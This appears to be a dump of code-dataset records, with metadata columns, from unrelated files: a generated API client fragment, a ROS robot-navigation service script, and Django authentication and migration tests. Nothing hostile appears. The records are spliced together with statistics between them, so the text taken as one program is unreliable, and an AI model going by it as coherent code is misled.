response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'NeighborhoodResult')
return responseObject
def deleteNeighbor(self, **kwargs):
"""Delete neighborhood
Args:
id, str: Delete Neighborhood for a given UUID (required)
Returns: TaskIdResult
"""
allParams = ['id']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method deleteNeighbor" % key)
params[key] = val
del params['kwargs']
resourcePath = '/v2/neighborhood/{id}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'DELETE'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('id' in params):
replacement = str(self.apiClient.toPathValue(params['id']))
replacement = urllib.parse.quote(replacement)
resourcePath = resourcePath.replace('{' + 'id' + '}',
replacement)
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
| 24.039039
| 106
| 0.51955
| 636
| 8,005
| 6.533019
| 0.179245
| 0.043803
| 0.052226
| 0.021661
| 0.825993
| 0.825993
| 0.825993
| 0.806739
| 0.806739
| 0.806739
| 0
| 0.00122
| 0.385759
| 8,005
| 332
| 107
| 24.111446
| 0.843807
| 0.090693
| 0
| 0.842466
| 0
| 0
| 0.130704
| 0.009213
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041096
| false
| 0
| 0.027397
| 0
| 0.143836
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f005e96d49c91a76ad86a21f78daf39121166101
| 76
|
py
|
Python
|
src/bug.py
|
pombredanne/setuptools-782
|
f4fc07001170344557bfa34361a5879a97156163
|
[
"Apache-2.0"
] | null | null | null |
src/bug.py
|
pombredanne/setuptools-782
|
f4fc07001170344557bfa34361a5879a97156163
|
[
"Apache-2.0"
] | null | null | null |
src/bug.py
|
pombredanne/setuptools-782
|
f4fc07001170344557bfa34361a5879a97156163
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function
def run():
print('hello world')
| 12.666667
| 37
| 0.723684
| 10
| 76
| 5
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.184211
| 76
| 5
| 38
| 15.2
| 0.806452
| 0
| 0
| 0
| 0
| 0
| 0.146667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
f0179d67d26cd27e428edc291916423e2a44dc58
| 15,074
|
py
|
Python
|
src/armadillo_navigation/scripts/navigation_services_for_simulation.py
|
aosbgu/ROSPlan-ExperimentPDDL
|
09de0ba980362606dd1269c6689cb59d6f8776c6
|
[
"MIT"
] | null | null | null |
src/armadillo_navigation/scripts/navigation_services_for_simulation.py
|
aosbgu/ROSPlan-ExperimentPDDL
|
09de0ba980362606dd1269c6689cb59d6f8776c6
|
[
"MIT"
] | null | null | null |
src/armadillo_navigation/scripts/navigation_services_for_simulation.py
|
aosbgu/ROSPlan-ExperimentPDDL
|
09de0ba980362606dd1269c6689cb59d6f8776c6
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import rospy
import time
import tf
import actionlib
from actionlib_msgs.msg import GoalStatus
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from geometry_msgs.msg import Point
from armadillo_navigation.srv import ser_message, ser_messageResponse
import os, time, signal, threading
import subprocess
from subprocess import Popen, PIPE, call
rospy.init_node('navigation_services')
def planning_cobra_center():
#End#################################################################################################
print('Planning to cobra-center!\n')
time.sleep(1)
proc = subprocess.Popen(["roslaunch robotican_demos_upgrade cobra_center.launch"], stdout=PIPE, stderr=PIPE, shell=True, universal_newlines=True)
while True:
lin = proc.stdout.readline()
if "success" in lin and "True" in lin:
break
elif "success" in lin and "False" in lin:
break
else:
continue
proc.terminate()
return
def _callback_navigate_corner_area(req):
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(1.350, 4.495, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, -1.552)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
if(ac.get_state() == GoalStatus.SUCCEEDED):
print("You have reached the open area")
ser_messageResponse(True)
time.sleep(1)
else:
print("The robot failed to reach the open area")
ser_messageResponse(False)
time.sleep(1)
def _callback_navigate_open_area(req):
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(5.719, -3.375, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, -1.501)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
if(ac.get_state() == GoalStatus.SUCCEEDED):
print("You have reached the open area")
ser_messageResponse(True)
time.sleep(1)
else:
print("The robot failed to reach the open area")
ser_messageResponse(False)
time.sleep(1)
def _callback_navigate_elevator(req):
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(7.650, 3.676, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, 1.650)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
time.sleep(4)
##repeated just to adjust the location, important for push button
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(7.191, 4.220, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, 1.604)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
if(ac.get_state() == GoalStatus.SUCCEEDED):
print("You have reached the elevator")
ser_messageResponse(True)
time.sleep(1)
else:
print("The robot failed to reach the elevator")
ser_messageResponse(False)
time.sleep(1)
def _callback_navigate_auditorium(req):
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(10.020, -0.656, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, -1.519)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
if(ac.get_state() == GoalStatus.SUCCEEDED):
print("You have reached the auditorium")
ser_messageResponse(True)
time.sleep(1)
else:
print("The robot failed to reach the auditorium")
ser_messageResponse(False)
time.sleep(1)
def _callback_navigate_lab_211(req):
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(0.356, 0.603, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, 0.224)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
if(ac.get_state() == GoalStatus.SUCCEEDED):
print("You have reached the lab211")
ser_messageResponse(True)
time.sleep(1)
else:
print("The robot failed to reach the lab211")
ser_messageResponse(False)
time.sleep(1)
def _callback_navigate_outside_lab211(req):
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(-3.133, 3.741, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, -3.099)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
time.sleep(2)
#repeat just for solid execution
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(-4.352, 4.006, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, -2.884)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
if(ac.get_state() == GoalStatus.SUCCEEDED):
print("You have reached the outside of lab211")
ser_messageResponse(True)
time.sleep(1)
else:
print("The robot failed to reach the outside of lab211")
ser_messageResponse(False)
time.sleep(1)
def _callback_navigate_corridor(req):
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(8.659, 3.203, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, 0.008)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
if(ac.get_state() == GoalStatus.SUCCEEDED):
print("You have reached the corridor")
ser_messageResponse(True)
time.sleep(1)
else:
print("The robot failed to reach the corridor")
ser_messageResponse(False)
time.sleep(1)
#it must be in cobra-center position before starting navigation
planning_cobra_center()
rospy.Service("/elevator_go", ser_message, _callback_navigate_elevator)
rospy.loginfo("navigation service is waiting for request...")
rospy.Service("/auditorium_go", ser_message, _callback_navigate_auditorium)
rospy.loginfo("navigation service is waiting for request...")
rospy.Service("/lab_211_go", ser_message, _callback_navigate_lab_211)
rospy.loginfo("navigation service is waiting for request...")
rospy.Service("/corridor_go", ser_message, _callback_navigate_corridor)
rospy.loginfo("navigation service is waiting for request...")
rospy.Service("/outside_lab_211_go", ser_message, _callback_navigate_outside_lab211)
rospy.loginfo("navigation service is waiting for request...")
rospy.Service("/open_area", ser_message, _callback_navigate_open_area)
rospy.loginfo("navigation service is waiting for request...")
rospy.Service("/corner_area", ser_message, _callback_navigate_corner_area)
rospy.loginfo("navigation service is waiting for request...")
rospy.spin()
| 42.823864
| 151
| 0.710694
| 2,127
| 15,074
| 4.881523
| 0.092149
| 0.060676
| 0.084947
| 0.078012
| 0.890109
| 0.87624
| 0.871328
| 0.864779
| 0.864779
| 0.845131
| 0
| 0.021972
| 0.175733
| 15,074
| 351
| 152
| 42.945869
| 0.813682
| 0.120539
| 0
| 0.719008
| 0
| 0
| 0.153564
| 0.001959
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033058
| false
| 0
| 0.045455
| 0
| 0.082645
| 0.061983
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b2f9fc3a1419efd892b2177e374dd53765880698
| 91,041
|
py
|
Python
|
authentication_service/tests/test_views.py
|
hedleyroos/core-authentication-service
|
4a59430cddf23c58322230dd1fe70998fcc46736
|
[
"BSD-3-Clause"
] | 1
|
2018-03-15T12:49:05.000Z
|
2018-03-15T12:49:05.000Z
|
authentication_service/tests/test_views.py
|
hedleyroos/core-authentication-service
|
4a59430cddf23c58322230dd1fe70998fcc46736
|
[
"BSD-3-Clause"
] | 215
|
2017-12-07T09:11:52.000Z
|
2022-03-11T23:19:59.000Z
|
authentication_service/tests/test_views.py
|
hedleyroos/core-authentication-service
|
4a59430cddf23c58322230dd1fe70998fcc46736
|
[
"BSD-3-Clause"
] | 1
|
2021-08-17T12:05:32.000Z
|
2021-08-17T12:05:32.000Z
|
import datetime
import random
import uuid
from unittest import mock
from django.conf import settings
from django.contrib import auth
from django.contrib.auth import get_user_model, login
from django.contrib.auth import hashers
from django.contrib.messages import get_messages
from django.core import signing
from django.core.urlresolvers import reverse
from django.test import TestCase, override_settings
from django.utils import timezone
from django_otp.plugins.otp_totp.models import TOTPDevice
from django_otp.util import random_hex
from oidc_provider.models import Client
from unittest.mock import patch, MagicMock
from defender.utils import unblock_username
from access_control import Invitation, InvitationRedirectUrl
from authentication_service import constants
from django.contrib.auth.hashers import check_password, make_password
from authentication_service.models import (
SecurityQuestion,
UserSecurityQuestion,
Organisation
)
from authentication_service.user_migration.models import (
TemporaryMigrationUserStore
)
class LoginHelper(object):
"""
Test urls can be handled a bit better, however this was the fastest way
to refactor the existing tests.
"""
# Wizard helper methods
def do_login(self, data):
return self.client.post(
f"{reverse('login')}?next=/openid/authorize/"
f"%3Fresponse_type%3Dcode%26scope%3Dopenid%26client_id"
f"%3Dmigration_client_id%26redirect_uri%3Dhttp%3A%2F%2F"
f"example.com%2F%26state%3D3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
data=data,
follow=True
)
class TestLogin(TestCase):
@classmethod
def setUpTestData(cls):
super(TestLogin, cls).setUpTestData()
cls.user = get_user_model().objects.create_user(
username="inactiveuser1",
email="inactive@email.com",
password="Qwer!234",
birth_date=datetime.date(2001, 1, 1)
)
cls.user.is_active = False
cls.user.save()
cls.client = Client.objects.create(
client_id="migration_client_id",
name= "MigrationCLient",
client_secret= "super_client_secret_1",
response_type= "code",
jwt_alg= "HS256",
redirect_uris= ["http://example.com/"]
)
def test_logged_in_user(self):
url = reverse('login')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
# force login a user, now he should not see registration page
self.client.force_login(self.user)
res = self.client.get(url)
self.assertRedirects(res, reverse('edit_profile'))
def test_inactive_user_login(self):
data = {
"login_view-current_step": "auth",
"auth-username": "inactiveuser1",
"auth-password": "Qwer!234"
}
response = self.client.post(
reverse("login"),
data=data,
follow=True
)
self.assertContains(response, "Your account has been deactivated. Please contact support.")
# patch bellow django defender util to always return true
# func take 3 args (request, login_unsuccessful, get_username)
@patch("defender.utils.check_request", new=lambda a, b, c: True)
def test_invalid_user_login(self):
user = get_user_model().objects.create_user(
username="testusername",
email="testusername@email.com",
password="Qwer!234",
birth_date=datetime.date(2001, 1, 1)
)
data = {
"login_view-current_step": "auth",
"auth-username": user.username,
"auth-password": "wrongpassword"
}
response = self.client.post(reverse("login"), data=data, follow=True)
self.assertEquals(response.context['form'].errors, {
'__all__': [
"Hmmm this doesn't look right. "
"Check that you've entered your username and password correctly and try again!"
]
})
def test_invalid_user_creds(self):
data = {
"login_view-current_step": "auth",
"auth-username": "",
"auth-password": ""
}
response = self.client.post(reverse("login"), data=data, follow=True)
self.assertEquals(response.context['form'].errors, {
'username': ['Please fill in this field.'],
'password': ['This field is required.'],
})
def test_active_user_login(self):
self.user.is_active = True
self.user.save()
data = {
"login_view-current_step": "auth",
"auth-username": self.user.username,
"auth-password": "Qwer!234"
}
response = self.client.post(
reverse("login"),
data=data,
follow=True
)
# user should be authenticated
self.assertRedirects(response, "{}".format(reverse("edit_profile")))
def test_migrated_user_login(self):
temp_user = TemporaryMigrationUserStore.objects.create(
username="migrateduser",
client_id="migration_client_id",
user_id=1
)
temp_user.set_password("Qwer!234")
data = {
"login_view-current_step": "auth",
"auth-username": temp_user.username,
"auth-password": "Qwer!234"
}
response = self.client.post(
f"{reverse('login')}?next=/openid/authorize/%3Fresponse_type%3Dcode%26scope%3Dopenid%26client_id%3Dmigration_client_id%26redirect_uri%3Dhttp%3A%2F%2Fexample.com%2F%26state%3D3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
data=data,
follow=True
)
self.assertIn(
"/migrate/",
response.redirect_chain[-1][0],
)
self.assertIn(
"/userdata/",
response.redirect_chain[-1][0],
)
self.assertEqual(
response.redirect_chain[-1][1],
302,
)
class TestLogout(LoginHelper, TestCase):
@classmethod
def setUpTestData(cls):
super(TestLogout, cls).setUpTestData()
cls.user = get_user_model().objects.create_superuser(
username="testuser",
email="wrong@email.com",
password="Qwer!234",
birth_date=datetime.date(2001, 12, 12)
)
cls.user.is_active = True
cls.user.save()
cls.client = Client.objects.create(
client_id="migration_client_id",
name="MigrationCLient",
client_secret="super_client_secret_1",
response_type="code",
jwt_alg="HS256",
redirect_uris=["http://example.com/"]
)
def test_logout(self):
with self.assertTemplateUsed("authentication_service/message.html"):
response = self.client.post(
reverse("registration"),
{
"registration_wizard-current_step": "userdata",
"userdata-username": "Username0",
"userdata-password1": "password",
"userdata-password2": "password",
"userdata-gender": "female",
"userdata-age": "16",
"userdata-terms": True,
"userdata-email": "email1@email.com",
},
follow=True
)
response = self.client.get(reverse("oidc_provider:end-session"))
self.assertRedirects(response, reverse('login'))
class TestMigration(LoginHelper, TestCase):
"""
Test urls can be handled a bit better, however this was the fastest way
to refactor the existing tests.
"""
@classmethod
def setUpTestData(cls):
super(TestMigration, cls).setUpTestData()
cls.temp_user = TemporaryMigrationUserStore.objects.create(
username="coolmigrateduser",
client_id="migration_client_id",
user_id=3
)
cls.temp_user.set_password("Qwer!234")
cls.user = get_user_model().objects.create_user(
username="existinguser",
email="existing@email.com",
birth_date=datetime.date(2001, 1, 1),
password="Qwer!234"
)
cls.question_one = SecurityQuestion.objects.create(
question_text="Some text for the one question"
)
cls.question_two = SecurityQuestion.objects.create(
question_text="Some text for the other question"
)
Client.objects.create(
client_id="migration_client_id",
name= "MigrationCLient",
client_secret= "super_client_secret_1",
response_type= "code",
jwt_alg= "HS256",
redirect_uris= ["http://example.com/"]
)
def test_userdata_step(self):
# Login and get the response url
data = {
"login_view-current_step": "auth",
"auth-username": self.temp_user.username,
"auth-password": "Qwer!234"
}
response = self.do_login(data)
# Default required
data = {
"migrate_user_wizard-current_step": "userdata"
}
response = self.client.post(
response.redirect_chain[-1][0],
data=data,
)
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.context["wizard"]["steps"].current, "userdata"
)
self.assertEqual(
response.context["wizard"]["form"].errors,
{"username": ["This field is required."],
"age": ["This field is required."],
"password1": ["This field is required."],
"password2": ["This field is required."]
}
)
# Username unique
data = {
"migrate_user_wizard-current_step": "userdata",
"userdata-username": self.user.username,
"userdata-age": 20,
"userdata-password1": "asdasd",
"userdata-password2": "asdasd"
}
response = self.client.post(
response._request.path,
data=data,
)
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.context["wizard"]["steps"].current, "userdata"
)
self.assertEqual(
response.context["wizard"]["form"].errors,
{"username": ["A user with that username already exists."]}
)
self.assertContains(
response, "A user with that username already exists."
)
def test_securityquestion_step(self):
# Login and get the response url
data = {
"login_view-current_step": "auth",
"auth-username": self.temp_user.username,
"auth-password": "Qwer!234"
}
response = self.do_login(data)
# Username unique
data = {
"migrate_user_wizard-current_step": "userdata",
"userdata-username": "newusername",
"userdata-age": 20,
"userdata-password1": "asdasd",
"userdata-password2": "asdasd"
}
response = self.client.post(
response.redirect_chain[-1][0],
data=data,
)
response = self.client.get(response.url)
data = {
"migrate_user_wizard-current_step": "securityquestions",
"securityquestions-TOTAL_FORMS": 2,
"securityquestions-INITIAL_FORMS": 0,
"securityquestions-MIN_NUM_FORMS": 0,
"securityquestions-MAX_NUM_FORMS": 1000,
}
response = self.client.post(
response._request.path,
data=data,
)
self.assertEqual(
response.context["wizard"]["form"].non_form_errors(),
["Please fill in all Security Question fields."]
)
self.assertContains(
response, "Please fill in all Security Question fields."
)
data = {
"migrate_user_wizard-current_step": "securityquestions",
"securityquestions-TOTAL_FORMS": 2,
"securityquestions-INITIAL_FORMS": 0,
"securityquestions-MIN_NUM_FORMS": 0,
"securityquestions-MAX_NUM_FORMS": 1000,
"securityquestions-0-question": self.question_one.id,
"securityquestions-0-answer": "Answer1",
"securityquestions-1-question": self.question_one.id,
"securityquestions-1-answer": "Answer2"
}
response = self.client.post(
response._request.path,
data=data,
)
self.assertEqual(
response.context["wizard"]["form"].non_form_errors(),
["Oops! You’ve already chosen this question. Please choose a different one."]
)
self.assertContains(
response, "Oops! You’ve already chosen this question. Please choose a different one."
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_migration_step(self):
# Login and get the response url
data = {
"login_view-current_step": "auth",
"auth-username": self.temp_user.username,
"auth-password": "Qwer!234"
}
response = self.do_login(data)
# Username unique
data = {
"migrate_user_wizard-current_step": "userdata",
"userdata-username": "newusername",
"userdata-age": 20,
"userdata-password1": "asdasd",
"userdata-password2": "asdasd"
}
response = self.client.post(
response.redirect_chain[-1][0],
data=data,
follow=True
)
data = {
"migrate_user_wizard-current_step": "securityquestions",
"securityquestions-TOTAL_FORMS": 2,
"securityquestions-INITIAL_FORMS": 0,
"securityquestions-MIN_NUM_FORMS": 0,
"securityquestions-MAX_NUM_FORMS": 1000,
"securityquestions-0-question": self.question_one.id,
"securityquestions-0-answer": "Answer1",
"securityquestions-1-question": self.question_two.id,
"securityquestions-1-answer": "Answer2"
}
self.assertEqual(get_user_model().objects.filter(
username=self.temp_user.username).count(), 0
)
response = self.client.post(
response._request.path,
data=data,
follow=True
)
self.assertRedirects(
response,
"/openid/authorize/?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http://example.com/&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO"
)
self.assertEqual(get_user_model().objects.filter(
username="newusername").count(), 1
)
self.assertEqual(
get_user_model().objects.get(
username="newusername").usersecurityquestion_set.all().count(),
2
)
self.assertEqual(
TemporaryMigrationUserStore.objects.filter(
username="coolmigrateduser").count(),
0
)
session_user = auth.get_user(self.client)
self.assertEqual(
session_user,
get_user_model().objects.get(username="newusername")
)
self.assertEqual(
get_user_model().objects.get(username="newusername").migration_data,
{
"client_id": "migration_client_id",
"user_id": 3,
"username": "coolmigrateduser"
}
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_migration_redirect_persist(self):
temp_user = TemporaryMigrationUserStore.objects.create(
username="newmigratedsupercooluser",
client_id="migration_client_id",
user_id=2
)
temp_user.set_password("Qwer!234")
data = {
"login_view-current_step": "auth",
"auth-username": temp_user.username,
"auth-password": "Qwer!234"
}
response = self.client.post(
f"{reverse('login')}?next=/openid/authorize/%3Fresponse_type%3Dcode%26scope%3Dopenid%26client_id%3Dmigration_client_id%26redirect_uri%3Dhttp%3A%2F%2Fexample.com%2F%26state%3D3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
data=data,
follow=True
)
data = {
"login_view-current_step": "auth",
"auth-username": temp_user.username,
"auth-password": "Qwer!234"
}
data = {
"migrate_user_wizard-current_step": "userdata",
"userdata-username": "newusername",
"userdata-age": 20,
"userdata-password1": "asdasd",
"userdata-password2": "asdasd"
}
response = self.client.post(
response.redirect_chain[-1][0],
data=data,
follow=True
)
data = {
"migrate_user_wizard-current_step": "securityquestions",
"securityquestions-TOTAL_FORMS": 2,
"securityquestions-INITIAL_FORMS": 0,
"securityquestions-MIN_NUM_FORMS": 0,
"securityquestions-MAX_NUM_FORMS": 1000,
"securityquestions-0-question": self.question_one.id,
"securityquestions-0-answer": "Answer1",
"securityquestions-1-question": self.question_two.id,
"securityquestions-1-answer": "Answer2"
}
self.assertEqual(get_user_model().objects.filter(
username=self.temp_user.username).count(), 0
)
response = self.client.post(
response._request.path,
data=data,
follow=True
)
self.assertRedirects(
response,
f"/openid/authorize/?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http://example.com/&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO"
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
@patch("django.core.signing.loads")
def test_expired_token(self, expire_mock):
expire_mock.side_effect = signing.SignatureExpired("Expired")
data = {
"login_view-current_step": "auth",
"auth-username": self.temp_user.username,
"auth-password": "Qwer!234"
}
response = self.do_login(data)
self.assertRedirects(
response,
"/en/login/?next=/openid/authorize/" \
"%3Fresponse_type%3Dcode%26scope%3Dopenid" \
"%26client_id%3Dmigration_client_id%26" \
"redirect_uri%3Dhttp%253A%252F%252Fexample.com%252F%26" \
"state%3D3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO"
)
class TestLockout(TestCase):
@classmethod
def setUpClass(cls):
super(TestLockout, cls).setUpClass()
